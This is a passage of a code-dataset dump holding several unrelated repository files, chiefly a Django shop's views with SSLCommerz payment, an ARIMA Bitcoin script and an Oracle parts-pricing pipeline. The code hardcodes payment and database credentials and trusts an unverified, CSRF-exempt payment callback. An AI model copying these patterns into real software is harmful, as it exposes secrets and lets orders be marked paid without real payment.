brands,'totalitem':totalitem\n })\n\ndef cloth(request, data=None):\n totalitem=0\n cloth = None\n \n if data is None:\n cloth = Product.objects.filter(category='Cl')\n elif data == 'below': \n cloth = Product.objects.filter(category='Cl', selling_price__lt=3000)\n elif data == 'above': \n cloth = Product.objects.filter(category='Cl', selling_price__gte=3000)\n else:\n cloth = Product.objects.filter(category='Cl', brand=data)\n \n paginator = Paginator(cloth, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand names from the Product model\n brands = Product.objects.filter(category='Cl').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/cloth.html', {\n 'page_obj': page_obj,\n 'brands': brands,'totalitem':totalitem\n })\n\nclass SearchView(View):\n def get(self, request):\n totalitem=0\n query = request.GET.get('q')\n if not query:\n return render(request, 'app/search.html', {'error': 'No search query specified'})\n\n products = Product.objects.filter(Q(title__icontains=query) | Q(brand__icontains=query) | Q(description__icontains=query))\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n context = 
{'products': products, 'query': query,'totalitem':totalitem}\n return render(request, 'app/search.html', context)\n#def login(request):\n# return render(request, 'app/login.html')\n\n#def customerregistration(request):\n# return render(request, 'app/customerregistration.html')\nclass CustomerRegistrationView(View):\n def get(self,request):\n form=SignUpForm()\n return render(request,'app/customerregistration.html',{'form':form})\n def post(self,request):\n form=SignUpForm(request.POST)\n if form.is_valid():\n messages.success(request,'Congratulations. your registration complete')\n form.save()\n return render(request,'app/customerregistration.html',{'form':form})\n\n \n@login_required \ndef checkout(request):\n totalitem=0\n user=request.user\n add=Customer.objects.filter(user=user)\n cart_items=Cart.objects.filter(user=user)\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==request.user]\n if cart_product:\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount +=tempamount\n total=amount+shipping_amount\n \n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/checkout.html',{'add':add,'total':total,'cart_items':cart_items,'totalitem':totalitem})\n@login_required\ndef payment_done(request):\n custid = request.POST.get('custid', '')\n try:\n customer = Customer.objects.get(id=custid)\n except Customer.DoesNotExist:\n messages.error(request, 'The selected customer does not exist. Please select a valid customer and try again.')\n return redirect('checkout')\n\n cart = Cart.objects.filter(user=request.user)\n orders = []\n for c in cart:\n order = OrderPlaced(user=request.user,\n customer=customer,\n product=c.product,\n quantity=c.quantity)\n orders.append(order)\n order.save()\n\n cart.delete()\n messages.info(request, '')\n return redirect('orders')\n\n\n\n@method_decorator(login_required,name='dispatch')\nclass profileView(LoginRequiredMixin, View):\n def get(self, request):\n totalitem=0\n user = request.user\n try:\n profile = Customer.objects.get(user=user)\n return redirect('profile-edit')\n except Customer.DoesNotExist:\n pass\n form = CustomerProfileForm()\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/profile.html', {'form': form, 'active': 'btn-primary','totalitem':totalitem})\n\n def post(self, request):\n totalitem=0\n user = request.user\n try:\n profile = Customer.objects.get(user=user)\n return redirect('profile-edit')\n except Customer.DoesNotExist:\n pass\n form = CustomerProfileForm(request.POST)\n if form.is_valid():\n name = form.cleaned_data['name']\n email = form.cleaned_data['email']\n mobile = form.cleaned_data['mobile']\n\n locality = form.cleaned_data['locality']\n city = form.cleaned_data['city']\n state = form.cleaned_data['state']\n zipcode = form.cleaned_data['zipcode']\n reg = Customer(user=user, name=name, email=email,mobile=mobile,locality=locality, city=city, state=state, zipcode=zipcode)\n reg.save()\n messages.info(request, 'Congratulations, your profile has been created!')\n return redirect('profile')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/profile.html', {'form': form, 'active': 'btn-primary','totalitem':totalitem})\n\nclass 
ProfileEditView(LoginRequiredMixin, View):\n def get(self, request):\n totalitem=0\n user = request.user\n try:\n profile = Customer.objects.get(user=user)\n form = CustomerProfileForm(instance=profile)\n except Customer.DoesNotExist:\n messages.error(request, 'You need to create a profile before you can edit it.')\n return redirect('profile')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/profile_edit.html', {'form': form,'active': 'btn-primary','totalitem':totalitem})\n\n def post(self, request):\n totalitem=0\n user = request.user\n try:\n profile = Customer.objects.get(user=user)\n except Customer.DoesNotExist:\n messages.error(request, 'You need to create a profile before you can edit it.')\n return redirect('profile')\n form = CustomerProfileForm(request.POST, instance=profile)\n if form.is_valid():\n form.save()\n messages.info(request, 'Profile has been updated.')\n return redirect('profile')\n else:\n messages.error(request, 'Please correct the errors below.')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/profile_edit.html', {'form': form,'totalitem':totalitem})\n\n@login_required\ndef payment(request):\n # create a payment request using SSLCommerz\n store_id = 'techh6447fca78b21e'\n API_key = 'techh6447fca78b21e@ssl'\n mypayment = SSLCSession(sslc_is_sandbox=True, sslc_store_id=store_id, sslc_store_pass=API_key)\n status_url = request.build_absolute_uri(reverse('complete'))\n print(status_url)\n mypayment.set_urls(success_url=status_url, fail_url=status_url, cancel_url=status_url, ipn_url=status_url)\n\n # Retrieve customer information from the request's user object\n user = request.user\n user = Customer.objects.get(user=user)\n cart_items = Cart.objects.filter(user=request.user)\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==request.user]\n if cart_product:\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount +=tempamount\n total=amount+shipping_amount\n \n if cart_product == 0:\n shipping_amount = 0\n else:\n shipping_amount = 100\n \n mypayment.set_product_integration(total_amount=Decimal(str(total)), currency='BDT', product_category='clothing', product_name='demo-product', num_of_item=Cart.objects.filter(user=request.user).count(), shipping_method='YES', product_profile='None')\n\n mypayment.set_customer_info(name=user.name, email=user.email, address1=user.locality, address2=user.locality, city=user.city, postcode=user.zipcode, country='Bangladesh', phone=user.mobile)\n\n mypayment.set_shipping_info(shipping_to=user.name, address=user.locality, city=user.city, postcode=user.zipcode, country='Bangladesh')\n\n response_data = mypayment.init_payment()\n \n \n return redirect(response_data['GatewayPageURL'])\n\n\n\n\n@csrf_exempt\ndef complete(request):\n # handle successful payment response from SSLCommerz\n if request.method == 'POST' or request.method == 'post':\n payment_data=request.POST\n status=payment_data['status']\n \n \n if status == 'VALID':\n val_id=payment_data['val_id']\n tran_id=payment_data['tran_id']\n bank_tran_id=payment_data['bank_tran_id']\n card_type=payment_data['card_type']\n \n messages.success(request,f\"your payment completed successfully\")\n return HttpResponseRedirect(reverse('purchase', kwargs={'val_id': 
val_id, 'tran_id': tran_id}))\n\n\n elif status == 'FAILED':\n messages.warning(request,f\"your payment Failed .please try again\")\n return render(request, 'app/complete.html')\n@login_required\ndef purchase(request, val_id, tran_id):\n cart = Cart.objects.filter(user=request.user, purchased=False)\n orders = []\n for c in cart:\n order = OrderPlaced(\n user=request.user,\n \n product=c.product,\n quantity=c.quantity,\n \n ordered=True,\n payment_Id=val_id,\n order_Id=tran_id,\n status='pending',\n )\n orders.append(order)\n order.save()\n c.purchased = True\n c.save()\n c.delete()\n return HttpResponseRedirect(reverse('home'))\n\n\n\ndef payment_success(request):\n # handle successful payment response from SSLCommerz\n return render(request, 'app/success.html',context=())\n\ndef payment_fail(request):\n # handle failed payment response from SSLCommerz\n return render(request, 'app/fail.html')\n\ndef payment_cancel(request):\n # handle canceled payment response from SSLCommerz\n return render(request, 'app/cancel.html')\n\n\ndef add_review(request, pk):\n products = Product.objects.get(pk=pk)\n if request.method == 'POST':\n form = ReviewForm(request.POST)\n if form.is_valid():\n review = form.save(commit=False)\n review.product = products\n review.user = request.user\n review.save()\n return redirect('product-detail', pk=products.pk)\n else:\n form = ReviewForm()\n return render(request, 'app/add_review.html', {'products': products, 'form': form})\n\n@login_required\ndef wishlist(request):\n totalitem = 0\n user = request.user\n wishlist_products = Wishlist.objects.filter(user=user).exclude(product__cart__user=user)\n \n if request.user.is_authenticated:\n totalitem = len(Cart.objects.filter(user=request.user))\n \n return render(request, 'app/wishlist.html', {'wishlist_products': wishlist_products, 'totalitem': totalitem})\n\n\n@login_required\ndef add_to_wishlist(request, pk):\n totalitem=0\n user = request.user\n \n product = Product.objects.get(pk=pk) # retrieve the Product instance\n \n # Check if the product is already in the user's wishlist\n if user.wishlist.filter(product=product).exists():\n messages.info(request, 'Product is already in your wishlist.')\n else:\n # Add the product to the user's wishlist\n Wishlist.objects.create(user=user, product=product).save()\n messages.success(request, '')\n print(f\"User: {user.username}\")\n print(f\"Product added to wishlist: {product.title}\")\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return redirect('/wishlist', {'totalitem':totalitem})\n\n\n ","repo_name":"Fariha-Alam/E-Commerce-1","sub_path":"djangoapp/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4735996784","text":"import pandas as pd\nimport numpy as np\nfrom statsmodels.tsa.stattools import adfuller\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nimport itertools\n\n# Leer datos\ndata = pd.read_csv('bitcoinprices.csv', parse_dates=['Date'], index_col='Date')\nprices = data['Price'].str.replace(',', '').astype(float)\n\n# Función para calcular el orden óptimo de diferenciación (d)\ndef find_optimal_d(series):\n result = adfuller(series)\n for d in range(1, 4):\n diff = np.diff(series, n=d)\n new_result = adfuller(diff)\n if new_result[1] < 0.05:\n return d\n return 0\n\n# Función para calcular los valores óptimos de p y q\ndef 
find_optimal_pq(series, p_max, q_max, d):\n best_pq = (0, 0)\n best_mse = float('inf')\n \n for p, q in itertools.product(range(p_max + 1), range(q_max + 1)):\n try:\n model = ARIMA(series, order=(p, d, q))\n results = model.fit()\n mse = mean_squared_error(series[d:], results.fittedvalues[d:])\n if mse < best_mse:\n best_pq = (p, q)\n best_mse = mse\n except:\n continue\n \n return best_pq\n\n# Encontrar valores óptimos de p, d y q\nd = find_optimal_d(prices)\np, q = find_optimal_pq(prices, p_max=5, q_max=5, d=d)\n\nprint(f\"Valores óptimos: p = {p}, d = {d}, q = {q}\")","repo_name":"adrianiux38/bitcoinPredictions","sub_path":"encontrarvalores.py","file_name":"encontrarvalores.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7186750871","text":"import numpy as np\nfrom ForCall01 import *\nfrom branch_code.dadi_loader import *\nimport pandas as pd\nimport time\n\ndef to_oracle():\n path1='outliers/品牌价原厂价价格异常值.csv'\n path2='changfang/4S店价.csv'\n path3='pp_yc/配件品牌价原厂价统计数据及模型预测.csv'\n path4='pp_yc/全国常用配件模型预测.csv'\n\n df1=pd.read_csv(path1)\n df2=pd.read_csv(open(path2,encoding='utf-8'))\n df3=pd.read_csv(open(path3,encoding='utf-8'))\n df4=pd.read_csv(open(path4,encoding='utf-8'))\n\n #配件左右对齐\n path6='data/左右-418-1.csv'\n df6=pd.read_csv(open(path6,encoding='utf-8'))\n df6_map=df6[['ORIGINALCODE_x','ORIGINALCODE_y']]\n df6_map.dropna(subset=['ORIGINALCODE_x','ORIGINALCODE_y'],how='any',axis=0,inplace=True)\n map_dict=dict(zip(df6_map['ORIGINALCODE_x'],df6_map['ORIGINALCODE_y']))\n def map_process(data):\n codes = data['ORIGINALCODE'].tolist()\n counts = data['count'].tolist()\n references = data['参考值'].tolist()\n for code_left in codes:\n if code_left in map_dict.keys():\n code_right=map_dict[code_left]\n if code_right in codes:\n ind_left=codes.index(code_left)\n ind_right=codes.index(code_right)\n count_left=counts[ind_left]\n count_right=counts[ind_right]\n if count_left>=count_right:\n references[ind_right]=references[ind_left]\n else:\n references[ind_left]=references[ind_right]\n return codes,counts,references\n\n fenzu_sta = df3.groupby(['JIGOU','BRAND_ID','CHGCOMPSET'])['ORIGINALCODE','count','REFERENCE'].apply(\n map_process).apply(pd.Series).reset_index()\n fenzu_sta.rename(columns={0:'ORIGINALCODE',1:'count',2:'参考值'},inplace=True)\n\n fenzu_sta1= fenzu_sta.set_index(['JIGOU','BRAND_ID','CHGCOMPSET'])['ORIGINALCODE'].apply(pd.Series).stack().reset_index()\n fenzu_sta1.drop(['level_3'], axis=1, inplace=True)\n fenzu_sta1.rename(columns={0: 'ORIGINALCODE'}, inplace=True)\n\n fenzu_sta2 = fenzu_sta.set_index(['JIGOU','BRAND_ID','CHGCOMPSET'])['count'].apply(pd.Series).stack().reset_index()\n fenzu_sta2.drop(['JIGOU','BRAND_ID','level_3','CHGCOMPSET'],axis=1,inplace=True)\n fenzu_sta2.rename(columns={0: 'count'}, inplace=True)\n\n fenzu_sta3 = fenzu_sta.set_index(['JIGOU','BRAND_ID','CHGCOMPSET'])['参考值'].apply(pd.Series).stack().reset_index()\n fenzu_sta3.drop(['JIGOU','BRAND_ID','level_3','CHGCOMPSET'], axis=1, inplace=True)\n fenzu_sta3.rename(columns={0: '参考值'}, inplace=True)\n fenzu_sta=pd.concat([fenzu_sta1,fenzu_sta2,fenzu_sta3],axis=1)\n\n df3.drop(['参考值'],axis=1,inplace=True)\n df3=pd.merge(df3,fenzu_sta,on=['JIGOU','BRAND_ID','ORIGINALCODE','count','CHGCOMPSET'],how='left')\n df3 = df3.drop_duplicates()\n\n #异常数据传到数据库\n df1.fillna('',inplace=True)\n df1=df1.astype(str)\n oracle = useOracle(\"dd_data2\", \"xdf123\", \"LBORA\")\n table_name1='LB_PEIJIAN_ORIGINAL_ABNORMAL'\n 
account=\"dd_data2/xdf123@10.9.1.169/lbora\"\n oracle.BatchsysteminsertDataToTable(df1,table_name1,account)\n\n #4S店价数据处理\n list1=['count','mean','median','mode']\n for i in list1:\n df2[i]=''\n df2=pd.DataFrame(df2,columns=['JIGOU','BRAND_ID','BRAND_NAME','COMMON_NAME','COMMON_ID','POS_ID','POS_NAME','ORIGINALCODE','STANDARD_PART_CODE','PRICE_TYPE','count','mean','median','mode','REFERENCE'])\n # ddd=df1.pivot_table(index=['区域','VEHSERINAME_TYPE','IS4S','工时组','项目名称'],columns=['车系档次'])\n\n #4S店价品牌价原厂价数据处理并拼接\n df3.rename(columns={'CHGCOMPSET':'PRICE_TYPE','参考值':'REFERENCE'},inplace=True)\n df3['PRICE_TYPE']=df3['PRICE_TYPE'].map(id2chgompset)\n df3=pd.DataFrame(df3,columns=['JIGOU','BRAND_ID','BRAND_NAME','COMMON_NAME','COMMON_ID','POS_ID','POS_NAME','ORIGINALCODE','STANDARD_PART_CODE','PRICE_TYPE','count','mean','median','mode','REFERENCE'])\n df23=pd.concat([df2,df3],axis=0)\n df23['METHOD']=1\n #模型预测数据处理\n df4.rename(columns={'CHGCOMPSET':'PRICE_TYPE'},inplace=True)\n df4['PRICE_TYPE'] = df4['PRICE_TYPE'].map(id2chgompset)\n list2=['count','mean','median','mode']\n for j in list2:\n df4[j]=''\n df4=pd.DataFrame(df4,columns=['JIGOU','BRAND_ID','BRAND_NAME','COMMON_NAME','COMMON_ID','POS_ID','POS_NAME','ORIGINALCODE','STANDARD_PART_CODE','PRICE_TYPE','count','mean','median','mode','REFERENCE'])\n df4['METHOD']=2\n #数据合并\n df234=pd.concat([df23,df4],axis=0)\n df234.drop_duplicates(subset=['JIGOU','BRAND_NAME','ORIGINALCODE','PRICE_TYPE'],keep='first',inplace=True)\n\n\n\n #配件数据上传到数据库\n now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n df234['INSERT_TIME'] = now_time\n list3 = ['STATUS', 'Update_Person', 'LAST_TIME']\n for k in list3:\n df23[k] = ''\n df234.rename(columns={'mode': 'mode1'}, inplace=True)\n df234['ID'] = [k for k in range(1, len(df234) + 1)]\n df234['JIGOU_ID'] = df234['JIGOU'].map(region2code)\n\n\n\n #从DATA_PART_ALL表中读取数据\n # commit1='''select t.JIGOU_ID,t.BRAND_ID,t.ORIGINALCODE,t.PART_ID from DATA_PART_ALL t '''\n commit1='''select t.JIGOU_ID,t.BRAND_ID,t.ORIGIN_CODE,t.PART_ID from LB_DATA_AUX_1 t '''\n DATA_PART_ALL=oracle.getData(commit1,account)\n DATA_PART_ALL.rename(columns={'ORIGIN_CODE':'ORIGINALCODE'},inplace=True)\n df234 = pd.merge(df234, DATA_PART_ALL, on=['JIGOU_ID', 'BRAND_ID','ORIGINALCODE'], how='left')\n df234['STATUS'] = 1\n\n # num = df234.groupby(['JIGOU_ID', 'BRAND_ID','ORIGINALCODE']).count().reset_index()\n # num['PART_ID'] = [id for id in range(10000000, 10000000 + len(num))]\n # num = pd.DataFrame(num, columns=['JIGOU_ID', 'BRAND_ID', 'ORIGINALCODE', 'PART_ID'])\n #\n # df234 = pd.merge(df234, num, on=['JIGOU_ID', 'BRAND_ID', 'ORIGINALCODE'], how='left')\n df234 = pd.DataFrame(df234,columns=['ID','PART_ID','JIGOU', 'JIGOU_ID', 'BRAND_ID', 'BRAND_NAME', 'COMMON_NAME', 'COMMON_ID',\n 'POS_ID', 'POS_NAME','ORIGINALCODE', 'STANDARD_PART_CODE', 'PRICE_TYPE', 'count', 'mean', 'median', 'mode1',\n 'REFERENCE','METHOD', 'STATUS', 'Update_Person', 'INSERT_TIME', 'LAST_TIME'])\n with open('changfang/peijian2standardcode.json',encoding='utf-8') as f1:\n peijian2standardcode=json.load(f1)\n df234['STANDARD_PART_CODE']=df234['COMMON_NAME'].map(peijian2standardcode)\n df234['STANDARD_PART_CODE'].fillna('999999',inplace=True)\n df234.fillna('',inplace=True)\n df234=df234.astype(str)\n table_name2='LB_PEIJIAN_SYSTEM'\n oracle.BatchpeijianinsertDataToTable(df234,table_name2,account)\n print('LB_PEIJIAN_SYSTEM DONE!')\n\n\n\n\n\n\n\n\n # commit1='''insert into 
LB_APMS_PARTS(PART_ID,JIGOU,JIGOU_ID,BRAND_ID,BRAND_NAME,COMMON_NAME,COMMON_ID,POS_ID,POS_NAME,ORIGIN_CODE,STANDARD_PART_CODE,\n # FREQUENCY,FACTORY_PRICE,CREATE_WAY,STATUS,INSERT_TIME) select t.PART_ID,t.JIGOU,t.JIGOU_ID,t.BRAND_ID,t.BRAND_NAME,t.COMMON_NAME,\n # t.COMMON_ID,t.POS_ID,t.POS_NAME,t.ORIGINALCODE as ORIGIN_CODE,t.STANDARD_PART_CODE,t.count as FREQUENCY,t.REFERENCE as FACTORY_PRICE,t.METHOD as CREATE_WAY,\n # 1 STATUS,t.INSERT_TIME from PEIJIAN_SYSTEM t where t.PRICE_TYPE = '4S店价' '''\n #\n # commit2='''insert into LB_APMS_PARTS(PART_ID,JIGOU,JIGOU_ID,BRAND_ID,BRAND_NAME,COMMON_NAME,COMMON_ID,POS_ID,POS_NAME,ORIGIN_CODE,STANDARD_PART_CODE,\n # FREQUENCY,ORIGIN_PRICE,CREATE_WAY,STATUS,INSERT_TIME) select t.PART_ID,t.JIGOU,t.JIGOU_ID,t.BRAND_ID,t.BRAND_NAME,t.COMMON_NAME,\n # t.COMMON_ID,t.POS_ID,t.POS_NAME,t.ORIGINALCODE as ORIGIN_CODE,t.STANDARD_PART_CODE,t.count as FREQUENCY,t.REFERENCE as ORIGIN_PRICE,t.METHOD as CREATE_WAY,\n # 1 STATUS,t.INSERT_TIME from PEIJIAN_SYSTEM t where t.PRICE_TYPE = '原厂价' '''\n #\n # commit3='''insert into LB_APMS_PARTS(PART_ID,JIGOU,JIGOU_ID,BRAND_ID,BRAND_NAME,COMMON_NAME,COMMON_ID,POS_ID,POS_NAME,ORIGIN_CODE,STANDARD_PART_CODE,\n # FREQUENCY,BRAND_PRICE,CREATE_WAY,STATUS,INSERT_TIME) select t.PART_ID,t.JIGOU,t.JIGOU_ID,t.BRAND_ID,t.BRAND_NAME,t.COMMON_NAME,\n # t.COMMON_ID,t.POS_ID,t.POS_NAME,t.ORIGINALCODE as ORIGIN_CODE,t.STANDARD_PART_CODE,t.count as FREQUENCY,t.REFERENCE as BRAND_PRICE,t.METHOD as CREATE_WAY,\n # 1 STATUS,t.INSERT_TIME from PEIJIAN_SYSTEM t where t.PRICE_TYPE = '品牌价' '''\n# commit='''insert into LB_APMS_PARTS\n# (PART_ID,\n# JIGOU,\n# JIGOU_ID,\n# BRAND_ID,\n# BRAND_NAME,\n# COMMON_NAME,\n# COMMON_ID,\n# POS_ID,\n# POS_NAME,\n# ORIGIN_CODE,\n# STANDARD_PART_CODE,\n# STATUS,\n# INSERT_TIME,\n# FACTORY_PRICE,\n# ORIGIN_PRICE,\n# BRAND_PRICE,\n# FREQUENCY)\n# select t.*,\n# a.REFERENCE as FACTORY_PRICE,\n# c.REFERENCE as ORIGIN_PRICE,\n# b.REFERENCE as BRAND_PRICE,\n# case\n# when (c.count is null and b.count is null) then\n# 1\n# when (b.count > 0 and c.count is null) then\n# b.count\n# when (c.count > 0 and b.count is null) then\n# c.count\n# when (b.count > 0 and c.count > 0 and b.COUNT >= c.COUNT) then\n# b.COUNT\n# else\n# c.COUNT\n# end FREQUENCY\n# from (select distinct PART_ID,\n# JIGOU,\n# JIGOU_ID,\n# BRAND_ID,\n# BRAND_NAME,\n# COMMON_NAME,\n# COMMON_ID,\n# POS_ID,\n# POS_NAME,\n# ORIGINALCODE as ORIGIN_CODE,\n# STANDARD_PART_CODE,\n# 1 STATUS,\n# INSERT_TIME\n# from PEIJIAN_SYSTEM\n# group by PART_ID,\n# JIGOU,\n# JIGOU_ID,\n# BRAND_ID,\n# BRAND_NAME,\n# COMMON_NAME,\n# COMMON_ID,\n# POS_ID,\n# POS_NAME,\n# ORIGINALCODE,\n# STANDARD_PART_CODE,\n# STATUS,\n# INSERT_TIME) t\n# left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE\n# from PEIJIAN_SYSTEM\n# where PRICE_TYPE = '4S店价'\n# and REFERENCE > 0) a\n# on t.PART_ID = a.PART_ID\n# left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE,COUNT\n# from PEIJIAN_SYSTEM\n# where PRICE_TYPE = '品牌价'\n# and REFERENCE > 0) b\n# on t.PART_ID = b.PART_ID\n# left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE,COUNT\n# from PEIJIAN_SYSTEM\n# where PRICE_TYPE = '原厂价'\n# and REFERENCE > 0) c\n# on t.PART_ID = c.PART_ID\n#\n# '''\n\n # commit = '''insert into LB_APMS_PARTS_LS\n # (PART_ID,\n # JIGOU,\n # JIGOU_ID,\n # BRAND_ID,\n # BRAND_NAME,\n # COMMON_NAME,\n # COMMON_ID,\n # POS_ID,\n # POS_NAME,\n # ORIGIN_CODE,\n # STANDARD_PART_CODE,\n # STATUS,\n # INSERT_TIME,\n # FACTORY_PRICE,\n # ORIGIN_PRICE,\n # BRAND_PRICE,\n # 
FREQUENCY)\n # select t.*,\n # a.REFERENCE as FACTORY_PRICE,\n # c.REFERENCE as ORIGIN_PRICE,\n # b.REFERENCE as BRAND_PRICE,\n # case\n # when (c.count is null and b.count is null) then\n # 1\n # when (b.count > 0 and c.count is null) then\n # b.count\n # when (c.count > 0 and b.count is null) then\n # c.count\n # when (b.count > 0 and c.count > 0 and b.COUNT >= c.COUNT) then\n # b.COUNT\n # else\n # c.COUNT\n # end FREQUENCY\n # from (select distinct PART_ID,\n # JIGOU,\n # JIGOU_ID,\n # BRAND_ID,\n # BRAND_NAME,\n # COMMON_NAME,\n # COMMON_ID,\n # POS_ID,\n # POS_NAME,\n # ORIGINALCODE as ORIGIN_CODE,\n # STANDARD_PART_CODE,\n # 1 STATUS,\n # INSERT_TIME\n # from LB_PEIJIAN_SYSTEM\n # group by PART_ID,\n # JIGOU,\n # JIGOU_ID,\n # BRAND_ID,\n # BRAND_NAME,\n # COMMON_NAME,\n # COMMON_ID,\n # POS_ID,\n # POS_NAME,\n # ORIGINALCODE,\n # STANDARD_PART_CODE,\n # STATUS,\n # INSERT_TIME) t\n # left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE\n # from LB_PEIJIAN_SYSTEM\n # where PRICE_TYPE = '4S店价'\n # and REFERENCE > 0) a\n # on t.PART_ID = a.PART_ID\n # left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE,COUNT\n # from LB_PEIJIAN_SYSTEM\n # where PRICE_TYPE = '品牌价'\n # and REFERENCE > 0) b\n # on t.PART_ID = b.PART_ID\n # left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE,COUNT\n # from LB_PEIJIAN_SYSTEM\n # where PRICE_TYPE = '原厂价'\n # and REFERENCE > 0) c\n # on t.PART_ID = c.PART_ID where t.PART_ID is not null\n\n # '''\n # list1=[commit]\n # for comm in list1:\n # oracle.executeCommitSubmit(comm, account)\nif __name__=='__main__':\n to_oracle()\n\n\n\n\n\n\n","repo_name":"loscharld/DADI_PEIJIAN_PRICE","sub_path":"statistics_data_to_oracle.py","file_name":"statistics_data_to_oracle.py","file_ext":"py","file_size_in_byte":14337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33918268099","text":"from invoke import task\n\nfrom ..config import (\n PROJECT_DIRS,\n RESOURCES,\n RESOURCE_DIR,\n)\n\n\n@task\ndef init(cx):\n \"\"\"Initialize the folder structure and other such fixtures.\"\"\"\n\n\n # create the folder structure\n for d in PROJECT_DIRS:\n cx.run(\"mkdir -p {}\".format(d))\n cx.run(\"touch {}/.keep\".format(d))\n\n@task\ndef link_resources(ctx):\n \"\"\"Make links to the project resource folders in this project\"\"\"\n\n for resource in RESOURCES:\n\n command = \"ln -s -r -f -T {res}/{resource} {proj}/{resource}\".format(\n res=RESOURCE_DIR,\n proj=PROJECT_DIR,\n resource=resource)\n\n print(\"Running\")\n print(command)\n print(\"-----------------------------\")\n ctx.run(command)\n\n","repo_name":"salotz/jubeo","sub_path":"modules/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"5867276278","text":"# Week 2 - Tutorial 2: Variables, Types and Formatting\n# Info1110 - Sandeep S\n# 13/05/2018\n# boolean_exp.py is a program which looks at boolean expressions: True/False\n\na = True\nb = False\nx = 50\n\n\n# Should print False\nresult = a and b\nprint(\"a and b = {}\".format(result))\n\n# Should print True\nresult = not(not(a)) or b\nprint(\"not(not(a)) ot b = {}\".format(result))\n\n# Should print True\nresult = a and not b or not a\nprint(\"a and not b or not a = {}\".format(result))\n\n# Should print True\nresult = (b and not(b)) or (a or not(a))\nprint(\"(b and not(b)) or (a or not(a)) = 
{}\".format(result))\n\n\n","repo_name":"sandeep183/info1110","sub_path":"Tutorials/Week2/boolean_exp.py","file_name":"boolean_exp.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24696681935","text":"import json\n\nimport psycopg2\nfrom django.http import HttpResponse\nfrom DBS2.settings import env\n\n\ndef index(request):\n\n database_connection = psycopg2.connect('host=' + env('DATABASE') + ' port=' + env('DATABASE_PORT') + ' user=' + env(\n 'DATABASE_LOGIN') + ' password=' + env('DATABASE_PW') + ' dbname=' + env('DATABASE_NAME'))\n cursor = database_connection.cursor()\n\n query = \"SELECT VERSION();\"\n cursor.execute(query)\n reply = cursor.fetchall()\n\n query2 = \"SELECT pg_database_size('dota2')/1024/1024 as dota2_db_size;\"\n cursor.execute(query2)\n reply2 = cursor.fetchall()\n\n cursor.close()\n database_connection.close()\n\n response = {\n \"pgsql\": {\n \"version\": reply[0][0],\n \"dota2_db_size\": reply2[0][0]\n\n }\n }\n\n return HttpResponse(json.dumps(response),content_type='application/json')\n\n\n\n","repo_name":"MarosLuk/skuska","sub_path":"DBS2/v1/health.py","file_name":"health.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14097907084","text":"import os\nos.chdir('K:/Learntek/Slides/test')\nfor file1 in os.listdir('.'):\n\tif file1.endswith(\"jpg\"):\n\t\tfile = file1.rsplit(\".\",1)[0]\n\t\tnew_name = file+\".\"+'png'\n\t\tos.rename(file1,new_name)\n\t\t\n\n\n\n","repo_name":"mohitraj/mohitcs","sub_path":"Learntek_code/10_july_18/os1.py","file_name":"os1.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"33628278102","text":"import pytest\n\nfrom . import consts\nfrom . 
